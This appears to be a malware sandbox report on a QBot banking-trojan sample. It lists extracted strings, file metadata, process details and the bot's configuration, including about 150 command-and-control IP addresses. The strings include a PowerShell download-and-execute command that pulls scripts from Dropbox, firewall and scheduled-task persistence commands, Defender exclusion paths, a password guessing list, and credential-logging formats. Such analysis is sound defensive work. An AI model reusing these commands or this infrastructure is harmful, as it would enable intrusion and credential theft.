HttpSendRequestW
IPC$
Initializing database...
InterlockedCompareExchange
InternetCloseHandle
InternetConnectA
InternetCrackUrlA
InternetGetCookieA
InternetGetCookieExA
InternetGetLastResponseInfoA
InternetOpenA
InternetOpenUrlA
InternetQueryDataAvailable
InternetQueryOptionA
InternetQueryOptionW
InternetReadFile
InternetReadFileExA
InternetSetOptionA
InternetSetStatusCallback
InternetWriteFile
LdrGetProcedureAddress
LdrLoadDll
LoadLibraryA
LoadResource
LocalFree
LookupAccountSidA
LookupAccountSidW
MBAMService.exe;mbamgui.exe
MessageBoxA
Microsoft
MicrosoftEdge.exe
Module32First
Module32Next
MoveFileA
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
MsMpEng.exe
NAT-PMP %u tcp
NetApiBufferFree
NetGetDCName
NetShareEnum
NetUserEnum
NetWkstaGetInfo
NtAllocateVirtualMemory
NtClose
NtCreateSection
NtFreeVirtualMemory
NtGetContextThread
NtMapViewOfSection
NtProtectVirtualMemory
NtQueryInformationProcess
NtQueryVirtualMemory
NtReadVirtualMemory
NtSetContextThread
NtUnmapViewOfSection
NtWow64QueryInformationProcess64
NtWow64ReadVirtualMemory64
NtWriteVirtualMemory
ObtainUserAgentString
OpenProcess
OpenSCManagerW
OpenThread
PFXExportCertStore
PR_Close
PR_GetError
PR_GetNameForIdentity
PR_OpenTCPSocket
PR_Read
PR_SetError
PR_Write
PStoreCreateInstance
PathCombineA
PathCombineW
PathMatchSpecA
PathMatchSpecW
PathUnquoteSpacesW
PeekMessageA
PeekMessageW
PostMessageA
PostQuitMessage
Process32First
Process32Next
ProfileImagePath
QEMU
QueryFullProcessImageNameW
Query_Main
RapportGP.DLL
ReadFile
ReadProcessMemory
Red Hat VirtIO
RegCloseKey
RegCreateKeyExA
RegDeleteValueA
RegEnumKeyExA
RegEnumValueA
RegOpenKeyExA
RegQueryInfoKeyA
RegQueryValueExA
RegSetValueExA
RegisterClassExA
RtlGetVersion
RtlNtStatusToDosError
RtlSetLastWin32Error
SAVAdminService.exe;SavService.exe
SOFTWARE\Microsoft\Internet Explorer\CodeIntegrity
SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet
SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Paths
SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
SOFTWARE\Microsoft\Windows Defender\SpyNet
SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Wow6432Node\Microsoft AntiMalware\SpyNet
SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet
SbieDll.dll
Self test FAILED!!!
Self test OK.
SendMessageA
Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\.\%coot\cimv2") Set colFiles = objWMIService.ExecQuery("Select * From CIM_DataFile Where Name = '%s'") For Each objFile in colFiles objFile.Copy("%s") Next
Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\.\%coot\cimv2") Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process") errReturn = objProcess.Create("%s", null, nul, nul)
SetCurrentDirectoryA
SetEndOfFile
SetEntriesInAclA
SetFilePointer
SetLastError
SetNamedSecurityInfoA
ShellExecuteA
ShowWindow
SizeofResource
SpyNetReporting
StackWalk64
StartServiceW
StrCmpIW
StrCmpNIA
StrStrIA
StrStrIW
StrStrW
StrTrimW
SubmitSamplesConsent
TranslateMessage
UnregisterClassA
UpdateWindow
VBoxGuest
VBoxVideo
VMAUDIO
VMware Accelerated
VMware Pointing
VMware Replay
VMware SCSI
VMware SVGA
VMware VMaudio
VMware Vista
VMware server memory
Virtual HD
VirtualAllocEx
VirtualFreeEx
VirtualProtect
VirtualProtectEx
WBJ_IGNORE
WEEKLY /D TUE,WED,THU /ST 12:00:00
WNetAddConnection2W
WNetCancelConnection2W
WNetCloseEnum
WNetEnumResourceW
WNetOpenEnumW
WRSA.exe
WSAConnect
WSAGetLastError
WSASend
WSASetLastError
WScript.Sleep %u Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\.\%coot\cimv2") Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process") errReturn = objProcess.Create("%s", null, nul, nul) WSCript.Sleep 2000 Set fso = CreateObject("Scripting.FileSystemObject")...
WTSEnumerateSessionsW
WTSFreeMemory
WTSQuerySessionInformationW
WTSQueryUserToken
WaitForSingleObject
Windows10 Edge HttpQueryInfo Bug!!!
WriteFile
WriteProcessMemory
ZwQueryInformationThread
ZwResumeThread
\sf2.dll
_decrypted.file;MultiAnalysis_v
aabcdeefghiijklmnoopqrstuuvwxyyz
aaebcdeeifghiiojklmnooupqrstuuyvwxyyaz
abc
abcdefghijklmnopqrstuvwxyz
administrator,argo,operator,administrador,user,prof,owner,usuario,admin,HP_Administrator,HP_Owner,Compaq_Owner,Compaq_Administrator
advapi32.dll
ansfltr
application/x-shockwave-flash
artifact.exe
aswhooka.dll
aswhookx.dll
avcuf32.dll
avgcsrvx.exe;avgsvcx.exe;avgcsrva.exe
avp.exe;kavtray.exe
bdagent.exe;vsserv.exe;vsservppl.exe
c1
c:\hiberfil.sysss
cashmanagementconnectionstring
ccSvcHst.exe
chrome.dll
chrome_child.dll
cmd /c schtasks.exe /Query > "%s"
cmd.exe /C \"start /MIN %s\system32\cscript.exe //E:javascript \"%s\"\" sudhfdus
cmd.exe /c ping -n 10 localhost && rmdir /S /Q "%s"
cmd=1&msg=%s&ports=
comet.yahoo.com;.hiro.tv;safebrowsing.google.com;geo.query.yahoo.com;googleusercontent.com;salesforce.com;officeapps.live.com;storage.live.com;messenger.live.com;.twimg.com;api.skype.com;mail.google.com;.bing.com;playtoga.com;.mozilla.com;.mozilla.org;hotbar.com;lphbs.com;contacts.msn.com;search.msn...
connect
coreServiceShell.exe;PccNTMon.exe;NTRTScan.exe
crypt32.dll
cryptui.dll
cscript.exe
data_after
data_before
data_end
data_inject
dbghelp.dll
dnsapi.dll
egui.exe;ekrn.exe
error res='%s' err=%d len=%u
exclude_url
explorer.exe
f1
firefox.exe
fmon.exe
fshoster32.exe
h1
h2
h3
https://
https://cdn.speedof.me/sample4096k.bin?r=0.%u
https://en.wikipedia.org/static/apple-touch/wikipedia.png
i1
i2
i3
i4
ignore_url
image/gif
image/jpeg
image/pjpeg
ivm-inject.dll
jHxastDcds)oMc=jvh7wdUhxcsdt2
k1
kb
kernel32.dll
m1
mcshield.exe
metsvc-server.exe
mlwr_smpl
mpr.dll
netapi32.dll
netsh advfirewall firewall add rule name="%s" dir=in action=allow program="%s" enable=yes
netsh firewall set allowedprogram "%s" %s ENABLE
netteller.com
npl
npq
nspr4.dll
nss3.dll
ntdll.dll
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl=1'); IEX (New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl=1'); Invoke-MainWorker -Command '%s'"
pstorec.dll
qbot_conf_path='%S' username='%S'
qbot_run_mutex='%s' username='%S'
reg.exe ADD "HKLM\%s" /f /t %s /v "%s" /d "%s"
rsabase.dll
rsaenh.dll
s2
sample
sbtisht
send
set_url
shell32.dll
shlwapi.dll
siteadvisor.com;avgthreatlabs.com;safeweb.norton.com
snxhk_border_mywnd
srootkit
t=%s time=[%02d:%02d:%02d-%02d/%02d/%d]
tcpdump.exe;windump.exe;ethereal.exe;wireshark.exe;ettercap.exe;rtsniff.exe;packetcapture.exe;capturenet.exe
u1
urlmon.dll
user32.dll
vSockets
vkise.exe;isesrv.exe;cmdagent.exe
vm3dmp
vmacthlp.exe
vmdebug
vmnat.exe
vmrawdsk
vmscsi
vmtoolsd.exe
vmx_svga
vmxnet
w1
wbj.go
webinjects.cb
windbg.exe;ChromeUpdate.exe;msdev.exe;dbgview.exe;ollydbg.exe;ctfmon.exe;Proxifier.exe;nav.exe;Microsoft.Notes.exe;ShellExperienceHost.exe;SecHealthUI.exe
windump.exe
wininet.dll
wpcap.dll
ws2_32.dll
wtsapi32.dll
{%02X%02X%02X%02X-%02X%02X-%02X%02X-%02X%02X-%02X%02X%02X%02X%02X%02X}
No Malware configuration.

TRiD

.exe | Win32 Executable (generic) (52.9)
.exe | Generic Win/DOS Executable (23.5)
.exe | DOS Executable Generic (23.5)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2020:06:04 15:33:54+02:00
ImageFileCharacteristics: No relocs, Executable, No line numbers, No symbols, 32-bit, No debug
PEType: PE32
LinkerVersion: 2.5
CodeSize: 1121280
InitializedDataSize: 91648
UninitializedDataSize: -
EntryPoint: 0x12d204
OSVersion: 4
ImageVersion: -
SubsystemVersion: 4
Subsystem: Windows GUI
FileVersionNumber: 1.8.0.1800
ProductVersionNumber: 1.8.0.1800
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Win32
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: English (U.S.)
CharacterSet: Windows, Latin1
CompanyName: Lovelysoft
FileDescription: Remote Performance Expert Helper Object
FileVersion: 1.8.0.1800
InternalName: -
LegalCopyright: Copyright © 2008-2013 Lovelysoft. All rights reserved
LegalTrademarks: All trademarks are the property of their respective owners.
OriginalFileName: -
ProductName: AdminToys Suite
ProductVersion: 2012
Comments: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
55
Monitored processes
11
Malicious processes
8
Suspicious processes
0

Behavior graph

Click at the process to see the details
start #QBOT sample_packed.exe no specs #QBOT sample_packed.exe cmd.exe no specs verclsid.exe no specs #QBOT sample_packed.exe no specs #QBOT sample_packed.exe no specs #QBOT sample_packed.exe no specs #QBOT sample_packed.exe #QBOT sample_packed.exe #QBOT sample_packed.exe wmpnscfg.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2912C:\Users\admin\AppData\Local\Temp\sample_packed.exe /CC:\Users\admin\AppData\Local\Temp\sample_packed.exe
sample_packed.exe
User:
admin
Company:
Lovelysoft
Integrity Level:
MEDIUM
Description:
Remote Performance Expert Helper Object
Exit code:
3221225622
Version:
1.8.0.1800
Modules
Images
c:\users\admin\appdata\local\temp\sample_packed.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
Qbot
(PID) Process(2912) sample_packed.exe
Botnetspx133
Campaign1591267427
Version324.142
C2 (149)1.40.42.4:443
100.38.123.22:443
104.221.4.11:2222
104.50.141.139:995
105.184.48.142:443
108.27.217.44:443
108.31.92.113:443
108.51.73.186:443
108.58.9.238:993
108.58.9.238:995
128.234.46.27:443
134.0.196.46:995
137.103.143.124:443
140.82.21.191:443
142.129.227.86:443
151.73.126.205:443
173.172.205.216:443
173.175.29.210:443
173.187.169.73:443
173.22.120.11:2222
173.245.152.231:443
173.49.122.160:995
173.79.220.156:443
174.34.67.106:2222
175.111.128.234:443
176.193.41.32:2222
184.180.157.203:2222
184.98.104.7:995
185.246.9.69:995
188.192.75.8:443
188.192.75.8:995
188.27.71.163:443
189.140.112.184:443
189.159.133.162:995
197.165.178.49:443
2.88.183.192:443
203.33.139.134:443
207.162.184.228:443
207.255.161.8:2078
207.255.161.8:2087
207.255.161.8:2222
207.255.161.8:32102
207.255.161.8:32103
207.255.18.67:443
216.163.4.91:443
216.201.162.158:995
24.10.42.174:443
24.152.219.253:995
24.201.79.208:2078
24.226.137.154:443
24.42.14.241:443
24.43.22.220:443
24.43.22.220:995
24.46.40.189:2222
24.99.180.247:443
47.136.224.60:443
47.146.169.85:443
47.152.210.233:443
47.153.115.154:443
47.153.115.154:995
47.201.1.210:443
47.205.231.60:443
47.35.182.97:443
47.40.244.237:443
49.144.84.21:443
49.191.4.245:443
5.12.114.96:443
5.13.99.38:995
5.14.251.226:443
50.244.112.106:443
50.244.112.10:443
50.247.230.33:995
50.29.181.193:995
59.124.10.133:443
62.121.123.57:443
62.38.111.70:2222
64.121.114.87:443
64.19.74.29:995
65.131.83.170:995
65.24.76.114:443
66.222.88.126:995
66.26.160.37:443
67.131.59.17:443
67.209.195.198:3389
67.5.28.72:465
67.83.54.76:2222
68.174.15.223:443
69.245.144.167:443
69.28.222.54:443
69.40.17.142:443
69.92.54.95:995
70.174.3.241:443
70.183.127.6:995
71.163.225.75:443
71.185.60.227:443
71.187.170.235:443
71.77.231.251:443
71.80.66.107:443
71.88.104.107:995
72.16.212.108:465
72.177.157.217:995
72.183.129.56:443
72.190.101.70:443
72.204.242.138:2078
72.204.242.138:443
72.209.191.27:443
72.240.245.253:443
72.28.255.159:995
72.29.181.77:2078
72.69.180.183:61202
73.94.229.115:443
74.215.201.122:443
74.56.167.31:443
75.183.171.155:3389
75.81.25.223:443
75.87.161.32:995
76.15.41.32:443
76.170.77.99:443
76.187.8.160:443
77.237.181.212:995
78.96.192.26:443
78.97.145.242:443
79.113.219.121:443
79.115.128.221:443
79.117.161.67:21
79.119.67.149:443
80.195.103.146:2222
80.240.26.178:443
81.103.144.77:443
81.133.234.36:2222
82.127.193.151:2222
82.76.239.193:443
85.121.42.12:995
85.186.141.62:995
86.123.106.54:443
86.126.97.183:2222
89.44.195.186:2222
93.113.90.128:443
96.18.240.158:443
96.35.170.82:2222
96.37.137.42:443
96.41.93.96:443
96.56.237.174:993
97.93.211.17:443
98.114.185.3:443
98.115.138.61:443
98.118.156.172:443
98.219.77.197:443
98.32.60.217:443
SaltjHxastDcds)oMc=jvh7wdUhxcsdt2
Strings (456)/F
/c ping.exe -n 6 127.0.0.1 & type "%s\System32\calc.exe" > "%s"
/ru ""
[begin]
[end]
cookie=[%s]
data=[%s]
exe=[%s] cmdline=[%s] pid=[%u] username=[%s]
ext_ip=[%s] dnsname=[%s] hostname=[%s] user=[%S] domain=[%S] is_admin=[%s] os=[%s] qbot_version=[%s] install_time=[%s] exe=[%S] prod_id=[%s]
host=[%s:%u] user=[%s] pass=[%s]
referer=[%s]
url=[%s]
url=[%s] data=[%s]
url=[%s] lb=[%s] data=[%s]
url=[%s] user=[%s] pass=[%s]
"%s\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn %s /tr "\"%s\" /I %s" /SC ONCE /Z /ST %02u:%02u /ET %02u:%02u
"%s\system32\schtasks.exe" /DELETE /F /TN %s
"%s\system32\schtasks.exe" /create /tn %S /tr "%s" /sc %S
%%%BOT_NICK%%%
%02u.%02u.%02u-%02u/%02u/%04u
%BOTID%
%BOT_COMPUTERNAME%
%BOT_MACHINE_UUID%
%BOT_USERDOMAIN%
%BOT_USERNAME%
%BOT_VENDOR_ID%
%ProgramFiles%\Internet Explorer\iexplore.exe
%ProgramFiles(x86)%\Internet Explorer\iexplore.exe
%SystemRoot%\SysWOW64\explorer.exe
%SystemRoot%\SysWOW64\mobsync.exe
%SystemRoot%\SysWOW64\xwizard.exe
%SystemRoot%\System32\mobsync.exe
%SystemRoot%\System32\xwizard.exe
%SystemRoot%\explorer.exe
%s "$windowsupdate = \"%s\"; & $windowsupdate"
%s %04x.%u %04x.%u res: %s seh_test: %u consts_test: %d vmdetected: %d createprocess: %d
%s \"$windowsupdate = \\\"%s\\\"; & $windowsupdate\"
%s%s/dupinst.php?n=%s&bg=%s&r=%u
%s\%s.vbs
%s\System32\WindowsPowerShell\v1.0\powershell.exe "$windowsupdate = \"%s\"; & $windowsupdate"
%s\System32\WindowsPowerShell\v1.0\powershell.exe \"$windowsupdate = \\\"%s\\\"; & $windowsupdate\"
%u.%s.%s.%08x
*/*
.cfg
.dat
.dll
.exe
.lnk
/bot_serv
/t3
000
1.nvprivateoffice.info
123,password,Password,letmein,1234,12345,123456,1234567,12345678,123456789,1234567890,qwerty,love,iloveyou,princess,pussy,master,monkey,abc123,99999999,9999999,999999,99999,9999,999,99,9,88888888,8888888,888888,88888,8888,888,88,8,77777777,7777777,777777,77777,7777,777,77,7,66666666,6666666,666666,6...
1234567890
2
23.49.13.33:7000
3
307
308
309
310
311
ADMIN$
ALLUSERSPROFILE
AdjustTokenPrivileges
Administrator
AllocateAndInitializeSid
AvastSvc.exe
ByteFence.exe
C$
C:\\INTERNAL\\__empty
CWSandbox
CertAddCRLContextToStore
CertAddCTLContextToStore
CertAddCertificateContextToStore
CertCloseStore
CertCreateCertificateChainEngine
CertDuplicateCRLContext
CertEnumCertificatesInStore
CertEnumSystemStore
CertFreeCRLContext
CertFreeCertificateChain
CertFreeCertificateChainEngine
CertFreeCertificateContext
CertGetCRLContextProperty
CertGetCertificateChain
CertGetEnhancedKeyUsage
CertGetNameStringW
CertOpenStore
CertSetCertificateContextProperty
CloseHandle
CloseServiceHandle
Content-Type: application/x-www-form-urlencoded
CreateDirectoryA
CreateFileA
CreateFileW
CreateProcessA
CreateProcessInternalW
CreateProcessW
CreateRemoteThread
CreateServiceW
CreateThread
CreateToolhelp32Snapshot
CreateWindowExA
CredEnumerateA
CredFree
CryptAcquireCertificatePrivateKey
CryptEnumOIDInfo
CryptFindOIDInfo
CryptUnprotectData
DefWindowProcA
DeleteFileA
DeleteService
DeleteServiceW
DeleteUrlCacheEntryW
DestroyWindow
DispatchMessageA
DnsQuery_A
DnsQuery_W
DynamicCodePolicy
EnumWindows
ExpandEnvironmentStringsA
Fiddler.exe;samp1e.exe;sample.exe;runsample.exe;lordpe.exe;regshot.exe;Autoruns.exe;dsniff.exe;VBoxTray.exe;HashMyFiles.exe;ProcessHacker.exe;Procmon.exe;Procmon64.exe;netmon.exe;vmtoolsd.exe;vm3dservice.exe;VGAuthService.exe;pr0c3xp.exe;ProcessHacker.exe;CFF Explorer.exe;dumpcap.exe;Wireshark.exe;i...
FindClose
FindFirstFileA
FindNextFileA
FindResourceA
FindWindowA
FreeSid
FtpDeleteFileA
FtpGetFileA
FtpOpenFileA
GenuineIntel
GetClipboardData
GetCurrentDirectoryA
GetCurrentThreadId
GetForegroundWindow
GetMessageA
GetMessageW
GetModuleFileNameA
GetModuleHandleA
GetProcAddress
GetUrlCacheEntryInfoW
GetVolumeInformationA
Global\{EEE80B68-1EF4-47C2-9017-59E46A84F3BC}
HOURLY /mo 5
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestW
HttpQueryInfoA
HttpQueryInfoW
HttpSendRequestA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestW
IPC$
Initializing database...
InterlockedCompareExchange
InternetCloseHandle
InternetConnectA
InternetCrackUrlA
InternetGetCookieA
InternetGetCookieExA
InternetGetLastResponseInfoA
InternetOpenA
InternetOpenUrlA
InternetQueryDataAvailable
InternetQueryOptionA
InternetQueryOptionW
InternetReadFile
InternetReadFileExA
InternetSetOptionA
InternetSetStatusCallback
InternetWriteFile
LdrGetProcedureAddress
LdrLoadDll
LoadLibraryA
LoadResource
LocalFree
LookupAccountSidA
LookupAccountSidW
MBAMService.exe;mbamgui.exe
MessageBoxA
Microsoft
MicrosoftEdge.exe
Module32First
Module32Next
MoveFileA
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
MsMpEng.exe
NAT-PMP %u tcp
NetApiBufferFree
NetGetDCName
NetShareEnum
NetUserEnum
NetWkstaGetInfo
NtAllocateVirtualMemory
NtClose
NtCreateSection
NtFreeVirtualMemory
NtGetContextThread
NtMapViewOfSection
NtProtectVirtualMemory
NtQueryInformationProcess
NtQueryVirtualMemory
NtReadVirtualMemory
NtSetContextThread
NtUnmapViewOfSection
NtWow64QueryInformationProcess64
NtWow64ReadVirtualMemory64
NtWriteVirtualMemory
ObtainUserAgentString
OpenProcess
OpenSCManagerW
OpenThread
PFXExportCertStore
PR_Close
PR_GetError
PR_GetNameForIdentity
PR_OpenTCPSocket
PR_Read
PR_SetError
PR_Write
PStoreCreateInstance
PathCombineA
PathCombineW
PathMatchSpecA
PathMatchSpecW
PathUnquoteSpacesW
PeekMessageA
PeekMessageW
PostMessageA
PostQuitMessage
Process32First
Process32Next
ProfileImagePath
QEMU
QueryFullProcessImageNameW
Query_Main
RapportGP.DLL
ReadFile
ReadProcessMemory
Red Hat VirtIO
RegCloseKey
RegCreateKeyExA
RegDeleteValueA
RegEnumKeyExA
RegEnumValueA
RegOpenKeyExA
RegQueryInfoKeyA
RegQueryValueExA
RegSetValueExA
RegisterClassExA
RtlGetVersion
RtlNtStatusToDosError
RtlSetLastWin32Error
SAVAdminService.exe;SavService.exe
SOFTWARE\Microsoft\Internet Explorer\CodeIntegrity
SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet
SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Paths
SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
SOFTWARE\Microsoft\Windows Defender\SpyNet
SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Wow6432Node\Microsoft AntiMalware\SpyNet
SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet
SbieDll.dll
Self test FAILED!!!
Self test OK.
SendMessageA
Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\.\%coot\cimv2") Set colFiles = objWMIService.ExecQuery("Select * From CIM_DataFile Where Name = '%s'") For Each objFile in colFiles objFile.Copy("%s") Next
Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\.\%coot\cimv2") Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process") errReturn = objProcess.Create("%s", null, nul, nul)
SetCurrentDirectoryA
SetEndOfFile
SetEntriesInAclA
SetFilePointer
SetLastError
SetNamedSecurityInfoA
ShellExecuteA
ShowWindow
SizeofResource
SpyNetReporting
StackWalk64
StartServiceW
StrCmpIW
StrCmpNIA
StrStrIA
StrStrIW
StrStrW
StrTrimW
SubmitSamplesConsent
TranslateMessage
UnregisterClassA
UpdateWindow
VBoxGuest
VBoxVideo
VMAUDIO
VMware Accelerated
VMware Pointing
VMware Replay
VMware SCSI
VMware SVGA
VMware VMaudio
VMware Vista
VMware server memory
Virtual HD
VirtualAllocEx
VirtualFreeEx
VirtualProtect
VirtualProtectEx
WBJ_IGNORE
WEEKLY /D TUE,WED,THU /ST 12:00:00
WNetAddConnection2W
WNetCancelConnection2W
WNetCloseEnum
WNetEnumResourceW
WNetOpenEnumW
WRSA.exe
WSAConnect
WSAGetLastError
WSASend
WSASetLastError
WScript.Sleep %u Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\.\%coot\cimv2") Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process") errReturn = objProcess.Create("%s", null, nul, nul) WSCript.Sleep 2000 Set fso = CreateObject("Scripting.FileSystemObject")...
WTSEnumerateSessionsW
WTSFreeMemory
WTSQuerySessionInformationW
WTSQueryUserToken
WaitForSingleObject
Windows10 Edge HttpQueryInfo Bug!!!
WriteFile
WriteProcessMemory
ZwQueryInformationThread
ZwResumeThread
\sf2.dll
_decrypted.file;MultiAnalysis_v
aabcdeefghiijklmnoopqrstuuvwxyyz
aaebcdeeifghiiojklmnooupqrstuuyvwxyyaz
abc
abcdefghijklmnopqrstuvwxyz
administrator,argo,operator,administrador,user,prof,owner,usuario,admin,HP_Administrator,HP_Owner,Compaq_Owner,Compaq_Administrator
advapi32.dll
ansfltr
application/x-shockwave-flash
artifact.exe
aswhooka.dll
aswhookx.dll
avcuf32.dll
avgcsrvx.exe;avgsvcx.exe;avgcsrva.exe
avp.exe;kavtray.exe
bdagent.exe;vsserv.exe;vsservppl.exe
c1
c:\hiberfil.sysss
cashmanagementconnectionstring
ccSvcHst.exe
chrome.dll
chrome_child.dll
cmd /c schtasks.exe /Query > "%s"
cmd.exe /C \"start /MIN %s\system32\cscript.exe //E:javascript \"%s\"\" sudhfdus
cmd.exe /c ping -n 10 localhost && rmdir /S /Q "%s"
cmd=1&msg=%s&ports=
comet.yahoo.com;.hiro.tv;safebrowsing.google.com;geo.query.yahoo.com;googleusercontent.com;salesforce.com;officeapps.live.com;storage.live.com;messenger.live.com;.twimg.com;api.skype.com;mail.google.com;.bing.com;playtoga.com;.mozilla.com;.mozilla.org;hotbar.com;lphbs.com;contacts.msn.com;search.msn...
connect
coreServiceShell.exe;PccNTMon.exe;NTRTScan.exe
crypt32.dll
cryptui.dll
cscript.exe
data_after
data_before
data_end
data_inject
dbghelp.dll
dnsapi.dll
egui.exe;ekrn.exe
error res='%s' err=%d len=%u
exclude_url
explorer.exe
f1
firefox.exe
fmon.exe
fshoster32.exe
h1
h2
h3
https://
https://cdn.speedof.me/sample4096k.bin?r=0.%u
https://en.wikipedia.org/static/apple-touch/wikipedia.png
i1
i2
i3
i4
ignore_url
image/gif
image/jpeg
image/pjpeg
ivm-inject.dll
jHxastDcds)oMc=jvh7wdUhxcsdt2
k1
kb
kernel32.dll
m1
mcshield.exe
metsvc-server.exe
mlwr_smpl
mpr.dll
netapi32.dll
netsh advfirewall firewall add rule name="%s" dir=in action=allow program="%s" enable=yes
netsh firewall set allowedprogram "%s" %s ENABLE
netteller.com
npl
npq
nspr4.dll
nss3.dll
ntdll.dll
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl=1'); IEX (New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl=1'); Invoke-MainWorker -Command '%s'"
pstorec.dll
qbot_conf_path='%S' username='%S'
qbot_run_mutex='%s' username='%S'
reg.exe ADD "HKLM\%s" /f /t %s /v "%s" /d "%s"
rsabase.dll
rsaenh.dll
s2
sample
sbtisht
send
set_url
shell32.dll
shlwapi.dll
siteadvisor.com;avgthreatlabs.com;safeweb.norton.com
snxhk_border_mywnd
srootkit
t=%s time=[%02d:%02d:%02d-%02d/%02d/%d]
tcpdump.exe;windump.exe;ethereal.exe;wireshark.exe;ettercap.exe;rtsniff.exe;packetcapture.exe;capturenet.exe
u1
urlmon.dll
user32.dll
vSockets
vkise.exe;isesrv.exe;cmdagent.exe
vm3dmp
vmacthlp.exe
vmdebug
vmnat.exe
vmrawdsk
vmscsi
vmtoolsd.exe
vmx_svga
vmxnet
w1
wbj.go
webinjects.cb
windbg.exe;ChromeUpdate.exe;msdev.exe;dbgview.exe;ollydbg.exe;ctfmon.exe;Proxifier.exe;nav.exe;Microsoft.Notes.exe;ShellExperienceHost.exe;SecHealthUI.exe
windump.exe
wininet.dll
wpcap.dll
ws2_32.dll
wtsapi32.dll
{%02X%02X%02X%02X-%02X%02X-%02X%02X-%02X%02X-%02X%02X%02X%02X%02X%02X}
3216"C:\Users\admin\AppData\Local\Temp\sample_packed.exe" C:\Users\admin\AppData\Local\Temp\sample_packed.exe
explorer.exe
User:
admin
Company:
Lovelysoft
Integrity Level:
MEDIUM
Description:
Remote Performance Expert Helper Object
Exit code:
0
Version:
1.8.0.1800
Modules
Images
c:\users\admin\appdata\local\temp\sample_packed.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
Qbot
(PID) Process(3216) sample_packed.exe
Botnetspx133
Campaign1591267427
Version324.142
C2 (149)1.40.42.4:443
100.38.123.22:443
104.221.4.11:2222
104.50.141.139:995
105.184.48.142:443
108.27.217.44:443
108.31.92.113:443
108.51.73.186:443
108.58.9.238:993
108.58.9.238:995
128.234.46.27:443
134.0.196.46:995
137.103.143.124:443
140.82.21.191:443
142.129.227.86:443
151.73.126.205:443
173.172.205.216:443
173.175.29.210:443
173.187.169.73:443
173.22.120.11:2222
173.245.152.231:443
173.49.122.160:995
173.79.220.156:443
174.34.67.106:2222
175.111.128.234:443
176.193.41.32:2222
184.180.157.203:2222
184.98.104.7:995
185.246.9.69:995
188.192.75.8:443
188.192.75.8:995
188.27.71.163:443
189.140.112.184:443
189.159.133.162:995
197.165.178.49:443
2.88.183.192:443
203.33.139.134:443
207.162.184.228:443
207.255.161.8:2078
207.255.161.8:2087
207.255.161.8:2222
207.255.161.8:32102
207.255.161.8:32103
207.255.18.67:443
216.163.4.91:443
216.201.162.158:995
24.10.42.174:443
24.152.219.253:995
24.201.79.208:2078
24.226.137.154:443
24.42.14.241:443
24.43.22.220:443
24.43.22.220:995
24.46.40.189:2222
24.99.180.247:443
47.136.224.60:443
47.146.169.85:443
47.152.210.233:443
47.153.115.154:443
47.153.115.154:995
47.201.1.210:443
47.205.231.60:443
47.35.182.97:443
47.40.244.237:443
49.144.84.21:443
49.191.4.245:443
5.12.114.96:443
5.13.99.38:995
5.14.251.226:443
50.244.112.106:443
50.244.112.10:443
50.247.230.33:995
50.29.181.193:995
59.124.10.133:443
62.121.123.57:443
62.38.111.70:2222
64.121.114.87:443
64.19.74.29:995
65.131.83.170:995
65.24.76.114:443
66.222.88.126:995
66.26.160.37:443
67.131.59.17:443
67.209.195.198:3389
67.5.28.72:465
67.83.54.76:2222
68.174.15.223:443
69.245.144.167:443
69.28.222.54:443
69.40.17.142:443
69.92.54.95:995
70.174.3.241:443
70.183.127.6:995
71.163.225.75:443
71.185.60.227:443
71.187.170.235:443
